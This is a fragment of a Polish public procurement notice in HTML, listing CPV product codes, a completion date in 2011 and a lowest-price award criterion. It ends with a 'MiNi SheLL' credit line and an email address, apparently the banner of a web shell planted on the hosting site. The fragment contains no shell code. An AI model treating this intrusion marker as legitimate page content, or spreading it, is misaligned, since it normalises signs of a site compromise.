<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.30.00-8, 15.61.30.00-8, 15.61.21.00-2, 15.62.00.00-0, 15.61.41.00-6, 15.61.33.80-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com